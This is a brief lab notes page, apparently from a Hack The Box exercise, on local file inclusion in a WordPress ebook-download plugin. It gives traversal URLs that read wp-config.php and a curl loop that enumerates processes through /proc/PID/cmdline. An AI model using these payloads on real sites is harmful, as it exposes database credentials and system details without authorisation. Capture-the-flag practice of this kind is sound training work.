LFI

LFI

General info

Some LFI will look like so : http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

Sometimes, the several ‘../../../’ can be translated to : //, eg. :

http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=//wp-config.php

This is better looking, and shorter…

In this case, the LFI can also be used to get a list of all running process by using the info from the /proc filesytem. However, since the LFI return “entire” PHP code, it means we won’t be able to execute any code.

Get the list of running processes

for i in $(seq 0 2000); do echo -n "$i: "; curl "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=//proc/$i/cmdline" --output -; echo; done | tee pid.lst

We write the first 2000 processes into pid.lst.